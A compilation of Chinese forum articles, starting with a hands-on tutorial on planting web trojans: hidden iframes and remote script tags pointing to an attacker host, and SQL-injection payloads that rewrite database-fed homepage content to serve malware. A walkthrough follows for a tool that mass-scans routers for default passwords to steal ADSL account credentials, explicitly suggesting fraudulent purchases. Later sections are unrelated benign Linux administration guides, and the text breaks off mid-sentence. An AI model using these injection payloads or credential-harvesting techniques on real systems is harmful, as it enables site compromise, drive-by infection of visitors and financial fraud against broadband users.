　　上面可能是一般的挂马方式，也是初学者的玩法，好了，再说深一点点的，那就是js文件，好多网站上，你查看源代码都会调用js文件，其中的语句为<script language=javascript src=./ad/ad.js></script>，想到了什么，这里也可以挂马，其中我们可以远程调用自己的js，比如:<script language=javascript src=http://www.fucksb.net/mm.js></script>这个mm.js就可以写木马了，怎么写呢，同样，我们还用最基本的iframe框架，不过在<script></script>之中可识别语言不是html，那怎么办呢，follow me,js文件可以这样写:document.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>");，这种形势，这时就可以执行此js中的代码了，当然了，说白了，其实全语句就是<script language=javascript>document.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>")</script>呵呵。。

　　聪明的你可能发现了一点，好像不止是js文件哦~，只要在<script></script>之中，无论什么后缀的文件，只要里面写的语句可以被javascript识别就会执行，对的，比如<script src=http://www.fucksb.net/mm.test></script>，又如<script src=http://www.fucksb.net/mm.lala></script>管他的后缀是什么，只要里面写的语句正确就会被执行了。

  同样，如果首页调用其它网站，或者次级目录中的htm,asp等如:<iframe src=./ad/news.htm width=300 height=200></iframe>
也可以在news.htm文件里挂马，可以是htm和js，随便哪种，这是比较隐蔽的玩法，这些适用于主页没有写权限的方法。

　 <script>同<iframe>2个相比较，好处是script整体挂马的代码长度比iframe小得多，很实用。说实用是在数据库方面，下面介绍。

    数据库挂马，这里我们拿mssql数据库为例子。

　　这里说的是首页调用到的数据库，比如新闻，论坛，公告，等等，一般是标题。这些需要经验去检测，举个例子，比如首页有一条新闻为：“明日开业”，那么鼠标点此新闻，地址栏打开的新窗口为news.asp?id=1，这种情况，这时，就可以判断此新闻是从数据库中调用的了，当然了，我们不说access，只说mssql。
　　首页，我们要有这个网站中的一个注入点，比如就点在vote.asp?id=123，同时，至少是Db_owner权限，这时如果要挂马可以不用取到webshell，因为如果我们的目的只在于挂马的话，而且有时，还得检测mssql数据库和web服务器不在同一个机器上，那挂马的方式就是更改数据库内容，这里我说的就是这种，如上面说的，首页显示的一条新闻标题为“明日开业”，如果首页显示的标题是“明日开业</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>”，那这样的话，首页就会执行这段代码了，像这种情况，找到了注入点，就得找表名，如此新闻的表名为news，字段为title，id,等等，根据猜测,id=1时，暴出的字段title的值就为“明日开业”，那么90%就可以猜到了，首页调用的数据库的字段就为news表中的title，这时在注入点，可以大胆提交vote.asp?id=123;update news set title='明日开业</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>' where id=1;--，这样就可以更改数据库了，前提是最少要少db_owner权限，当然也有时由于代码原因，也可以这样提交:vote.asp?id=123';update news set title='明日开业</a><ifrmae src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>' where id=1 and '1'='1，也可以...
　　这种方法是有问题的，实战中存在不少问题，因为一般的情况下，标题都是通过<table>来限制宽度，也就是说如果你的标题的长度超过了指定的长度，那么你的代码只能写一半，这样就不能执行了，所以挂马最好的方法是用<script>这种方法来挂马了，如:
vote.asp?id=123;update news set title='明日开业</a><script src=http://www.fucksb.net/mm.js></script>' where id=1;--长度有很大的减少，很不错。
 
  后台挂马
  通常注入等不到webshell，就只能靠进后台挂马。

  这里说的是进入了后台，但不能通过后台得到webshell，这时要仔细关察后台，像比较网站的链接、顶部底部的广告、都可以直接写入你的木马代码，等等，后台是灵活的，具体问题具体分析。不过有一点很重要，是不要打乱前台htm源文件里的代码逻辑，比如应该闭合前面的<a><img>"( 等这些符号，应该先闭合掉如</a></img>")。

  其它形式

  如一首页调用了<iframe src=vote.asp?id=1&no=view width=100></iframe>此种形势，一样可以在vote.asp中直接写入iframe木马代码，如果调用的是<script src=vote.asp?id=1&no=view width=100></script>在vote.asp写代码时，请用document.write("")这种格式写入，当然，如果被挂文件中还有调用的文件可以继续往深处写，如果你够狠的话，直接写到数据库配置文件中，如conn.asp，这样好多页面可以同时挂上你的一种木马了。
  当然这里也有js文件，一样原理。
  挂一个网站的马，不一定就得攻入他，有时没有方法的同时，可以考虑跨站。好多站用了别的站的js文件，如:<script src=http://www.163.com/user.js>这种情势，这时就可以考虑只拿163.com的权限就了，只要能修改到user.js文件就可以挂到你要挂的站点了，同理，也有<iframe src=http://www.163.com/user.htm>此种情况，一样道理，剑走偏锋，达到目的，无论用什么招数了。
 
  服务器挂马
  这里简单说一个比较狠的吧.
  重定向任何调用的htm，js,等文件，只要是执行的如图:



这种方法在计算中用搜索关键词是搜索不到的，反正本地怎么找也找不到。。谁能想到是在iis里设置的呢？而且调用文件那么多，怎么知道是重定向的那个文件呢？反正现在想不到有什么好方法可以解决，如果服务器如上图被挂马了，偶最好的建议是重装IIS..^_^

信息来源：Internet


1、<script>location.assign('http://www.xxx.com');</script>
2、<script>document.location="http://www.xxx.com";</script>
3、<script>window.location="http://www.xxx.com";</script>
4、<%response.redirect "http://www.xxx.com"%>
5、<meta http-equiv=refresh content=0;URL=http://www.xxx.com>
其中:CONTENT="5 是指多长时间网页转向.一般设为2或者3比较合适.URL是转向目标网页的地址
6、<% Server.Transfer("test.asp") %> 只能使用相对路径
7、<script language="javascript">location.replace(http://www.xxx.com);
</script>
8、如果需要，可以把javascript自动重定向脚本存在一个外部文件中，并通过下面的命令行来加载，其中"filename.js"是该外部文件的路径和文件名： <script language="javascript" src="filename.js"></script>
注意：若需实现即刻转向，或不希望人们看到转向前的那个页面，一般常用javascript脚本实现。在这种情况下应将javascript脚本放入HTML源码的<HEAD>区中。
9、<script language="javascript">document.myform.submit()</script>
<form name="myform" action="pagename.html" method="get"></form>

其中"myform"可以是任意名称，"pagename.html"用相对/绝对URL地址均可。

搜索引擎的"爬行"程序是不会填写表单的，所以它们也不会注意到提交表单，因而可以利用表单来实现自动转向(重定向)而不让搜索引擎察觉。对于表单，人们往往很少意识到：表单的Action参数中包含的URL地址其实正是浏览器向服务器所请求的URL。浏览器将会通过向请求的URL地址增加一些格式为name=value的参数给予它以特殊的对待。在什么都没有的情况下，浏览器仍旧会为该URL安排请求至服务器。

文章作者：怪狗
测试环境:Windows Server 2003 Sp1
最初冲QB的方法是，扫广东IP段的SA弱口令，然后开3389直接进别人机器去冲，当时黑客动画吧出了个教程，N多人去扫广东的SA弱口令，都把IP段扫光了.然后7月份华夏公布了另外个刷QB的方法,同样也是扫广东的IP段.用WEBDAV扫ADSL路由然后通过默认密码进去找ADSL帐号密码.然后到互联那登陆冲值.后面的呢,就是扫代理,找站挂鸽子,然后开代理.冲QB.不过小菜门也难得黑到大站，挂点小站又没电信的肉鸡，所以只好借助我们今天所讲的这个软件来进行扫描路由弱口令.因为电信和网通的猫都具有WEB管理的功能，为了方便修改路由设置.而一般密码都是默认的.用默认密码进了猫之后 ，就可用查看源文件的方法找到ADSL密码.利用此软件能省下N多步骤，提高了破解的效率.下面看下软件说明
好多adsl拨号上网的用户都没有修改自已的adsl猫的管理界面默认密码，这样别人就可以打开adsl管理界面查看拨号上网的帐号和密码。

本软件可以通过远程扫描，将这些用户找出来，然后通知他们修改adsl的默认用户名和密码。程序采用多线程设计，一小时可以扫描近6万个IP地址，自动扫描具有管理
界面的adsl猫，并且用自带的密码字典尝试打开，然后自动找到拨号上网帐号和密码。
现有功能：
1.采用多线程设计，一小时可以扫描近6万个IP地址，扫描速度是目前最快的，在晚上在线人多的时候扫描，经测试，一小时最多时可破解800个以上的帐号；
2.自带了目前市面＊通、＊信常给用户发的adsl猫的型号对应的默认用户名和密码，破解率高达80%以上；
3.程序整合了目前最新的全球IP数据库，可以针对性的扫描某一个省、市范围的adsl用户。支持根据省、市名查询IP段，或根据IP地址查询所在地理位置；
4.完善的扫描结果管理，所以扫描出来的帐号和密码均能自动查询出所在地理位置，并且保存在程序数据库中。可以根据省市名查询破解的帐号和密码；
5.具有扫描历史记录，可以将当前扫描的IP范围保存在历史记录数据库中，下次打开时继续扫描；
6.破解率高，只要对方的adsl支持网页管理界面，就可以用自带的密码字典试出管理用户名和密码，如果以后出现新的adsl型号的猫，只要按说明书将默认用户
名和密码添加到密码字典中即可；
运行要求：
硬件：cpu pIII300以上，内存 128兆以上。
系统：支持 windows 95/97/98/98se/2000/xp/xp+sp2/2003，具备网络连接
详细说明：
    像移动运营商的手机代收费业务一样，目前中国电信也充分利用自己的用户资源、网络资源、应用支撑平台资源、营销网络、客户服务和宣传渠道等资源，正大力推广着互联星空（ChinaVnet）的SP代收费业务。利用中国电信的SP代收费系统，用户可以十分方便的在各类SP（Service Provider：互联网内容及应用服务商）网站上使用自己的163或宽带上网帐号和密码在网上完成很多收费服务的缴费过程，所需要的一切费用都在该上网帐号绑定的固定电话的电话费中扣除，这样，虽然给我们带来了及大的便利，但是同时也给我们带来了前所未有的危险性。
　　 随着中国电信ADSL宽带上网包月业务的普及，很多用户都选择了物美价廉的ADSL宽带包月上网业务，因为上网费是包月计算的，所以很多用户对自己宽带帐号密码的安全性毫不在意，认为上网费是包月的，就算别人知道自己的上网帐号密码也没有关系，自己毫无任何损失。
　　 以前得到别人的上网帐号没有什么用，只能用来上网，而且还很容易被查出来。现在一旦有人通过各种手段，得到了adsl用户的上网帐号和密码，就可以使用用户的帐号在网上购买大量的东西而最后由该用户埋单，给用户带来直接的经济损失。
  本软件就是用来找出网络上的没有修改默认密码的用户，以提高人们的帐号安全意识
这下小菜门要高兴了吧？安装好界面如下,图1

破解密码之前我们要对软件进行配置.点左上方"扫描选项",在"开始IP"和"结束IP"输入框里输入要扫描的IP地址,这个大家都会我也不都说.填好后点下面的"加入列表"按钮就自动加到下方的列表了.这里可以加入N个IP列表.如图2

一小段一小段IP扫很不爽,正好这个工具自带了IP数据库查询的功能,点上面的工具选项,看到了吧?在地址=>IP段那里.查询字段那里输入你要查找的地区.然后点查询,哗,一大堆IP段出来了.
欢迎到华夏黑客论坛交流！

http://bbs.77169.com

如图3


[NextPage]

欢迎到华夏黑客论坛交流！

http://bbs.77169.com

然后我再看到扫描选项那里,会发现下面有个"扫描选项",这里可要注意一下咯.
线程数:
就是采用多线程扫描,这样就可以充分利用网络资源.不过也会造成带宽占用过大.机器卡死.所以呢,ADSL上网的用户就别开这么大的线程了,搞不好别人没扫着,自己先断网了.默认是400线,线越大扫得越快.而你带宽不够,所以只好调小一点好.
超时:
扫描的时候程序是通过TCP协议连接的.这里可以指定超时的值,超时越大.扫得越慢,同样超时越小,扫得越快.不过在带宽不足的情况下.会漏掉点机器.
端口:
这里指得是ADSL猫的WEB管理端口.默认是80,有些是81,8080等.
右边有个ADSL密码字典.这里收集了一些ADSL猫的默认密码.你也可以自己添加.按"用户名"="密码"的格式加.好了现在点上方第2个"扫描"选项.再点下开始就OK了,如图4

哈~一会就把猫的默认帐号给弄出来了,而且该软件还可以破解上网帐号和密码.呵呵,怎么利用就看你自己了.如图5

爽吧?扫出来了.我这里只扫描了一小段.为什么能把上网帐号也破出来呢?因为程序会辨别猫使用的芯片.会自动在管理页面找帐户密码信息.如果找不到的话请自行登陆WEB管理页面查找.怎么样查找我就不多说了,在以前玩过冲QB的都知道.得到这些帐户密码可以干些什么呢?
1.可以恶作剧,进管理页面把他猫重起了,对方就断网了.
2.免费上网,用破出的上网帐户来拨号,只要是同一地区,同一市.就可以,不过有些是不能共用的.你一上对方就上不去了.改密码别人还可以挂失回来,也没什么用.
3.消费各种业务.当地的互联星空不是开通了N种服务吗?去试试吧,很多惊喜在等着你!
ADSL密码终结者下载：
http://download2.77169.com/soft/hacrktools/carck/adslpass.zip
我一般都在华夏黑客论坛中交流！大家可以来论坛和我一起讨论
http://bbs.77169.com

信息来源：华夏黑客同盟论坛


RedHat Linux 为增加系统安全性提供了防火墙保护。防火墙存在于你的计算机和网络之间，用来判定网络中的远程用户有权访问你的计算机上的哪些资源。一个正确配置的防火墙可以极大地增加你的系统安全性。



为你的系统选择恰当的安全级别。
　　
　　「高级」
　　
　　如果你选择了「高级」 ，你的系统就不会接受那些没有被你具体指定的连接（除了默认设置外）。只有以下连接是默认允许的：
　　
　　DNS回应
　　
　　DHCP — 任何使用 DHCP 的网络接口都可以被相应地配置。
　　
　　如果你选择「高级」，你的防火墙将不允许下列连接：
　　
　　1.活跃状态FTP（在多数客户机中默认使用的被动状态FTP应该能够正常运行。）
　　
　　2.IRC DCC 文件传输
　　
　　3.RealAudio
　　
　　4.远程 X 窗口系统客户机
　　
　　如果你要把系统连接到互联网上，但是并不打算运行服务器，这是最安的选择。如果需要额外的服务，你可以选择 「定制」 来具体指定允许通过防火墙的服务。
　　
　　注记:如果你在安装中选择设置了中级或高级防火墙，网络验证方法（NIS 和 LDAP）将行不通。
　　
　　「中级」
　　
　　如果你选择了「中级」，你的防火墙将不准你的系统访问某些资源。访问下列资源是默认不允许的：
　　
　　1.低于1023 的端口 — 这些是标准要保留的端口，主要被一些系统服务所使用，例如： FTP 、 SSH 、 telnet 、 HTTP 、和 NIS 。
　　
　　2.NFS 服务器端口（2049）— 在远程服务器和本地客户机上，NFS 都已被禁用。
　　
　　3.为远程 X 客户机设立的本地 X 窗口系统显示。
　　
　　4.X 字体服务器端口（ xfs 不在网络中监听；它在字体服务器中被默认禁用）。
　　
　　如果你想准许到RealAudio之类资源的访问，但仍要堵塞到普通系统服务的访问，选择 「中级」 。你可以选择 「定制」 来允许具体指定的服务穿过防火墙。
　　
　　注记:如果你在安装中选择设置了中级或高级防火墙，网络验证方法（NIS 和 LDAP）将行不通。
　　
　　「无防火墙」
　　
　　无防火墙给予完全访问权并不做任何安全检查。安全检查是对某些服务的禁用。建议你只有在一个可信任的网络（非互联网）中运行时，或者你想稍后再进行详细的防火墙配置时才选此项。
　　
　　选择 「定制」 来添加信任的设备或允许其它的进入接口。
　　
　　「信任的设备」
　　
　　选择「信任的设备」中的任何一个将会允许你的系统接受来自这一设备的全部交通；它不受防火墙规则的限制。例如，如果你在运行一个局域网，但是通过PPP拨号连接到了互联网上，你可以选择「eth0」，而后所有来自你的局域网的交通将会被允许。把「eth0」选为“信任的”意味着所有这个以太网内的交通都是被允许的，但是ppp0接口仍旧有防火墙限制。如果你想限制某一接口上的交通，不要选择它。
　　
　　建议你不要将连接到互联网之类的公共网络上的设备定为 「信任的设备」 。
　　
　　「允许进入」
　　
　　启用这些选项将允许具体指定的服务穿过防火墙。注意：在工作站类型安装中，大多数这类服务在系统内没有被安装。
　　
　　「DHCP」
　　
　　如果你允许进入的 DHCP 查询和回应，你将会允许任何使用 DHCP 来判定其IP地址的网络接口。DHCP通常是启用的。如果DHCP没有被启用，你的计算机就不能够获取 IP 地址。
　　
　　「SSH」
　　
　　Secure（安全）SHell（SSH）是用来在远程机器上登录及执行命令的一组工具。如果你打算使用SSH工具通过防火墙来访问你的机器，启用该选项。你需要安装openssh-server 软件包以便使用 SSH 工具来远程访问你的机器。
　　
　　「Telnet」
　　
　　Telnet是用来在远程机器上登录的协议。Telnet通信是不加密的，几乎没有提供任何防止来自网络刺探之类的安全措施。建议你不要允许进入的Telnet访问。如果你想允许进入的 Telnet 访问，你需要安装 telnet-server 软件包。
　　
　　「WWW (HTTP)」
　　
　　HTTP协议被Apache（以及其它万维网服务器）用来进行网页服务。如果你打算向公众开放你的万维网服务器，请启用该选项。你不需要启用该选项来查看本地网页或开发网页。如果你打算提供网页服务的话，你需要安装 httpd 软件包。
　　
　　启用 「WWW (HTTP)」 将不会为 HTTPS 打开一个端口。要启用 HTTPS，在 「其它端口」 字段内注明。
　　
　　「邮件 (SMTP)」
　　
　　如果你需要允许远程主机直接连接到你的机器来发送邮件，启用该选项。如果你想从你的ISP服务器中收取POP3或IMAP邮件，或者你使用的是fetchmail之类的工具，不要启用该选项。请注意，不正确配置的 SMTP 服务器会允许远程机器使用你的服务器发送垃圾邮件。
　　
　　「FTP」
　　
　　FTP 协议是用于在网络机器间传输文件的协议。如果你打算使你的 FTP 服务器可被公开利用，启用该选项。你需要安装 vsftpd 软件包才能利用该选项。
　　
　　「其它端口」
　　
　　你可以允许到这里没有列出的其它端口的访问，方法是在 「其它端口」 字段内把它们列出。格式为： 端口:协议 。例如，如果你想允许 IMAP 通过你的防火墙，你可以指定 imap:tcp 。你还可以具体指定端口号码，要允许 UDP 包在端口 1234 通过防火墙，输入 1234:udp 。要指定多个端口，用逗号将它们隔开。
　　
　　窍门:要在安装完毕后改变你的安全级别配置，使用 安全级别配置工具 。 在 shell 提示下键入 redhat-config-securitylevel 命令来启动 安全级别配置工具 。如果你不是根用户，它会提示你输入根口令后再继续。

文章作者：数码咖啡

  在RH9中，dhcpd的配置文件是：/etc/dhcpd.conf 默认的情况下，这个文件不存在，不过当dhcp-3.0pl1-23.i386.rpm（应该是在安装盘的第2张上。。。^_^）安装以后，提供了一个配置文件摸板

关于模板的内容，可以使用CAT命令查看。

#cat /usr/share/doc/dhcp-3.0pl1/dhcpd.conf.sample

DHCP服务器的配置，我们得通过复制配置文件模板来进行修改

下面是操作的一个例子：

#cd /etc

#cp /usr/share/doc/dhcp-3.0pl1/dhcpd.conf.sample dhcp.conf //复制配置文件模板

#vi /etc/dhcpd.conf //使用vi修改/etc/dhcpd.conf

#cat /etc/dhcpd.conf //显示配置文件内容

ddns-update-style interim;

ignore client-updates;

subnet 192.168.1.0 netmask 255.255.255.0 {     //设置子网声明 

    option routers           192.168.1.254;   //为DHCP用户设置默认网关 

    option broadcast-address     192.168.1.255;   //为客户设置广播地址 

    option subnet-mask       255.255.255.0;   //为客户设置子网淹码 

    option domain-name     "hackbase.com"; //为客户设置DNS域 

    option domain-name-servers     192.168.1.1,192.168.1.2; //为客户设置DNS服务器地址 

    option time-offset         -18000;   

    range dynamic-bootp 192.168.1.10 192.168.1.100; //设置地址池 

    default-lease-time 21600; //为客户设置默认地址租期 

    max-lease-time 43200;   //为客户设置最大地址租期

group{ 
    host greenpig { //设置主机声明 

        hardware ethernet 12:34:56:78:AB:CD; //指定客户的MAC地址 

        fixed-address 192.168.1.7; //对指定的MAC地址分配固定IP地址 

    }
}

启动DHCP服务器：

#service dhcpd start

配制DHCP客户：

LINUX下，在图形界面中选择自动获取IP地址设置使用DHCP即可，若配置WIN客户选择INTERNET协议（TCP/IP）单机属性，选择自动获得IP地址。

from ChinaITLab.com

Linux的一个重要的特点就是其源代码的公开性，全世界任何一个软件工程师都可以将自己认为优秀的代码加入到其中，由此引发的一个明显的好处就是Linux修补漏洞的快速以及对最新软件技术的利用。而Linux的内核则是这些特点的最直接的代表。
　　
　　
　　　　为什么要升级内核
　　
　　
　　　　正如它的名字的字面意义，Linux的内核承担着Linux操作系统的最为核心的任务，是其它程序和硬件等运行过程中的仲裁者：它要管理所有进程的内存，保证它们都能平等得到处理器的时隙。此外，它还提供程序和硬件之间的接口等功能。
　　
　　　　通常，更新的内核会支持更多的硬件，具备更好的进程管理能力，运行速度更快、更稳定，并且一般会修复老版本中发现的许多漏洞等，经常性地选择升级更新的系统内核是Linux使用者的必要操作内容。
　　
　　　　一般，内核的版本序列号使用三个数字表示，如2.2.14，版本号越高表示功能越强。版本号分为两个系列：一种是产品系列，以偶数命名，例如，1.2.x、2.0.x、2.2.x等，运行稳定，已经经过较为周密的测试；另外一种是开发测试系列，以奇数命名，用以进行最新功能的测试，不建议初学者和生产过程中使用。
　　
　　　　本文的后面部分将分别以内核2.0.34到2.2.14的升级过程介绍内核升级用到的步骤、概念、注意事项以及可以参考的更多文档，文中出现的斜体字是直接输入的命令。
　　
　　
　　　　内核的配置与编译
　　
　　
　　　　Linux当前支持的CPU类型包括x86、ARM、DEC Alpha、SUN Sparc、M68000、MIPS、PowerPC等，应该说上述类型已经包括绝大多数用户使用的CPU型号。在安装与配置过程中，Linux会自动识别这些型号。
　　
　　　　通常要运行的第一个命令是：＃cd /usr/src/linux;make mrproper。确保源代码目录下没有不正确的.o文件以及文件的互相依赖。
　　
　　　　接下来的内核配置过程比较烦琐，但是配置的适当与否与日后Linux的运行直接相关，有必要了解一下一些主要的且经常用到的选项的设置。
　　
　　　　配置内核可以根据需要与爱好使用下面命令中的一个：
　　
　　　　＃make config （基于文本的最为传统的配置界面）
　　
　　　　＃make menuconfig （基于文本选单的配置界面）
　　
　　　　＃make xconfig （基于图形窗口模式的配置界面）
　　
　　　　＃make oldconfig （如果只想在原来内核配置的基础上修改一些小地方，会省去不少麻烦）
　　
　　　　进行配置时，大部分选项可以使用其缺省值，只有小部分需要根据用户不同的需要选择。例如，如果需要内核支持DOS分区的文件系统，则要在文件系统部分选择FAT或DOS系统支持；系统如果配有网卡、PCMCIA卡等，需要在网络配置中选择相应卡的类型。
　　
　　　　选择相应的配置时，有三种选择，它们分别代表的含义如下：
　　
　　　　“Y”－ 将该功能编译进内核
　　
　　　　“N”－ 不将该功能编译进内核
　　
　　　　“M”－ 将该功能编译成可以在需要时动态插入到内核中的模块。
　　
　　　　将与核心其它部分关系较远且不经常使用的部分功能代码编译成为可加载模块，有利于减小内核的长度，减小内核消耗的内存，简化该功能相应的环境改变时对内核的影响。许多功能都可以这样处理，例如像上面提到的网卡的支持、对FAT等文件系统的支持。
　　
　　　　配置完内核，接下来需要对内核源代码文件的依赖性和完整性进行检验，并且进行编译，此时要保证系统所使用的gcc版本在gcc－2.7.2以上：
　　
　　　　＃make dep (确保关键文件在正确的位置)
　　
　　　　＃make clean (确保所有有关文件都处于最新版本状态)
　　
　　　　＃make zImage (编译压缩形式的内核)
　　
　　　　在需要内核支持较多的外设和功能时，内核可能变得很大，此时可以编译大内核：
　　
　　　　＃make bzImage
　　
　　　　编译的时间与机器的硬件条件及内核的配置等因素有关，以笔者的64MB内存的赛扬300为例，编译内核一次大致需要20多分钟。所获得的内核的位置在/usr/src/linux/arch/i386/boot目录下，当然这里假设用户的CPU是x86型的。
　　
　　　　如果选择了可加载模块，编译完内核后，要对选择的模块进行编译：
　　
　　　　＃make module (编译选择的模块)
　　
　　　　＃make module－install (将编译后的模块转移到系统标准位置)
　　
　　　　模块在系统中的标准目录位于/lib/modules/x.y.z，后面的x.y.z是版本号，为安全起见，在运行＃make modules－install之前最好对/lib/modules进行备份。模块通常是带有扩展名.o的文件，使用命令＃lsmod可以对当前内核的模块进行列表。
　　
　　
　　　　软件下载与解包
　　
　　
　　　　选择相对快速并且具有权威性的站点下载最新的内核源代码包，例如条件允许的话可以到下面的站点下载：
　　
　　　　ftp://sunsite.unc.edu/pub/linux/kernel
　　
　　　　国内Linux用户可以到下面的站点下载：
　　
　　　　http://studio.openunix.org
　　
　　　　http://www.clinuxworld.com
　　
　　　　注意，如果升级版本的跨度很大，并且预计会配置外部模块时，还要下载最新的模块工具modules－x.y.z.tar.gz。
　　
　　　　Linux系统的核心代码存放于目录/usr/src/linux，实际上，该目录是一个链接，指向当前所用的核心版本的目录，例如如果当前使用的版本是2.0.34，则该核心的实际目录应该是：/usr/src/linux－2.0.34。而新下载的内核中的目录是linux，这样，直接在/usr/src下解包会导致原来的内核目录被覆盖。所以稳妥的做法是，首先删除链接linux，然后解包、更名、重新链接。
　　
　　　　在解包前要确认在/usr/src目录下没有叫linux的目录，或者不再想保留该目录。
　　
　　　　另外，随着Linux内核功能的增强及对更多外设的支持，文件包也越变越大，当前最新的稳定版2.2.14内核压缩包的大小约为14MB，但实际上解压缩及编译等环节，要求/usr/src目录所在的分区的空闲空间大于60MB字节。
　　
　　
　　　　启用新内核
　　
　　
　　　　将编译好的新内核拷贝到系统目录/boot下，例如
　　
　　　　＃cp /usr/src/linux/arch/i386/boot/zImage /boot/zImage－2.2.14
　　
　　　　然后，编辑系统引导配置文件/etc/lilo.conf，仿照原有选项添入新内核选项，给它起一个明显好记的标签（label），记住此时最好保留原有内核以及相应的选项，这样不用害怕升级失败而机器启动不了，至少还可以使用旧的内核引导自己的计算机。保存编辑后退出，此时要记住运行命令：＃lilo，更新系统引导映象，这样对lilo.conf的修改才能起作用。
　　
　　　　重启机器后，在LILO的提示符下按“Tab”键，则应该看到加入的新内核选项。
　　
　　　　对于当前国内进行汉化后的Linux版本，由于其中的几个主要版本是在内核中进行，例如冲浪平台的Xteam Linux、蓝点Bluepoint Linux等，所以使用这些发行版本的用户如果按照上面的步骤进行内核升级则会导致汉化失败、系统运行不稳定等后果。用户需要等待厂家发行新内核的汉化包，然后到厂家指定的下载站点下载，按照其中的说明进行升级。

信息来源：ChinaITLab收集整理


为降低TCO，很多中、小企业都把低端的、单一的基础服务器应用放到了Linux系统上。比如，DNS和DHCP服务器、Web服务器、目录服务器、文件和打印服务器、Intranet代理服务器、中小型数据库服务器，以及防火墙等。这样以来，Linux系统的备份就成了用户普遍关心的问题。
　　
　　备份工具
　　
　　一般来说，从Windows转到Linux的用户习惯用Ghost做备份，Ghost的压缩功能能够省下不少硬盘空间。对于硬盘紧张的用户来说，它的确是相当好用的。不过，Ghost无法备份Linux下的XFX、JFX、XFS等高级文件系统。另外，Ghost还有还原磁盘或分区的映像之后，无法启动具有 GRUB 引导加载程序的Linux的问题。
　　
　　Linux系统自带的备份工具是tar和cpio。tar工具继承了Unix备份文件的方法，几乎可以工作于任何环境中，类Unix系统的老用户一般都信赖它。与tar相比，GNU cpio更为复杂，但是也更为可靠。
　　
　　它可通过管道功能，使得打包时的文件选择、排除更为方便。如果tar文件中有坏块，就不能对文件的其它部分进行访问，而使用cpio，则只有坏块的部分不能访问。它像tar工具一样使用命令行启动程序。
　　
　　afio是一个基于开放源代码的备份工具。它可以支持多种备份硬件，比如，磁带、软盘、ZIP、硬盘等，是一个相当好用的工具。afio与tar命令类似，并且它的存档能够在支持cpio命令的系统下操作。
　　
　　afio通常比cpio要快，且提供了更多磁带选项，更适合于利用没有硬件压缩功能的磁带进行压缩备份。afio支持对单个文件的压缩，同时支持交互式处理多卷文档包，并且能更友好地处理有讹误的输入数据。
　　
　　用afio制作压缩文档包比tar或cpio更安全。在备份处理脚本中，afio是更佳的“文档处理引擎”。
　　
　　安装afio
　　
　　许多Linux发行版本都包括afio，也可以到http://scdbackup.webframe.org/afio-2.4.6.tgz 下载afio最新版本2.4.6的源代码，进行编译安装。命令如下：
　　
　　#gunzip afio-2.4.6.tgz
　　#tar vxf afio-2.4.6.tar
　　#cd afio-2.4.6
　　#make
　　#make install
　　
　　系统会在/usr/bin目录下建立afio命令。afio将文件列表存档为标准输入流，所以afio作为存档工具，其基本语法包含两个命令：
　　
　　#find path1 path2 ...[-opts] || afio -[i|o|t] [-vZ]device
　　
　　上面代码中，各参数含义如下：
　　
　　-i(input from)参数用来恢复磁带或者存档中的备份文件。
　　
　　-o(output to) 参数用来把备份文件写入到磁带或者存档。
　　
　　-t参数用来测试磁带或者存档。
　　
　　-v参数用来对处理文件进行列表。
　　
　　-Z参数表示在文件写入磁带之前，需要用gzip进行压缩。
　　
　　应用实例
　　
　　1.备份
　　
　　通常使用find命令来提供afio要处理的文件列表，也可以利用find的特殊功能和afio构造一个更专业、更灵活的文件存档计划。 比如，要将/usr目录树写到磁带设备/dev/st0中，使用下列命令：
　　
　　#find /usr | afio -o /dev/st0
　　
　　如果在将文件写到磁带之前进行压缩，使用下列命令：
　　
　　#find /usr | afio -o -Z /dev/st0
　　
　　2.恢复
　　
　　要将存档恢复到根目录，使用-i参数代替-o参数,恢复压缩的文档，要包含-Z参数：
　　
　　#cd /;afio -i -Z /dev/st0
　　
　　3.定时备份
　　
　　利用crontab工具可以对afio的备份进行计划，设置成基于任何时间的、有规律运行的定时任务。例如，要在每晚3点把/home目录备份到SCSI磁带驱动器中，只要把下面的语句添加到root用户的crontab文件中即可：
　　
　　00 03 * * * ls /home | afio -o > /dev/st0
　　
　　有关使用afio进行更加复杂操作的信息，可以参见afio的帮助。

信息来源：Linux技术中坚站


一、 如何建立多用户

　　提醒大家一句，别一直使用root用户，因为root用户在系统中有着至高无上的权力，一不小心就可能破坏系统。比如我们想删除/temp目录下的文件却将命令不小心输成“rm / temp（在‘/’后多了一个空格）”，那么就极可能删去根目录下的所有文件。再者，“Linux是一个真正意义上的多任务、多用户系统”，不体会一下Linux的特色岂不可惜。为了方便自己和别人使用，就在Linux系统下多建几个用户吧。

　　输入“adduser newuser”，回车，屏幕对命令没有一点儿反应，错啦？不，实际上，系统已接受了新用户。你应该接着输入命令 “passwd newuser”，屏幕将提示输入口令，再次输入确认， 一个新的用户就增加成功，真简单。马上登录试一试吧。

　　Linux提供了六个虚拟控制台，用ALT+F1~F6切换（在X-window下用CRTL+ALT+F1~F6切换），每个控制台均可以用不同的用户登录，运行不同的程序。赶快为家人和朋友建个用户吧。


　　 二、在Linx命令行下依次运行：
　　cd/
　　tar xzvf rmp-2.3.11.tar.gz
　　cd rpm-2.3.11
　　./configure
　　make
　　make install
　　mkdir /var/local /var/local/lib /var/local/lib/rpm /var/lib/rpm

　　这样，你就完成了RPM的安装,以后便可以在网上或光盘上寻找软件的RPM安装版。然后使用RPM进行安装，RPM的使用方法很简单：
　　1. 用RPM安装软件包 ：rpm -ivh 软件文件名
　　例如 rpm -ivh fvwm95-2.0.43a.chinese-1.i386.rpm 屏幕上就会输出该软件包的名称和安装的进度条:
　　fvwm95 ###############
　　当进度条走到底，中文fvwm95（一种X-Window的界面）就安装完了，再运行X-Window，啊，全中文

　　的fvwm95就在我的眼前。

　　2. 用RPM反安装软件包:rpm -e 软件名
　　例如:rpm -e fvwm95

　　3. 用RPM升级软件包:rpm -Uvh 软件升级版文件名
　　例如:rpm -Uvh fvwm95-2.1.0a.chinese-1.i386.rpm，RPM自动反安装原来的老版本，将升级版的软件安装入系统。怎么样，不难吧！

　　 三、如何安装Linux的应用软件

　　对于普通用户，安装或升级软件可以用Red Hat公司的软件包安装与管理工具RPM。使用后你就可以轻松安装软件、升级软件和卸载软件并查询软件信息。

　　如果你安装的是Red Hat Linux，那么你就可以使用RPM了，如果不是，你可以先安装RPM。方法如下：
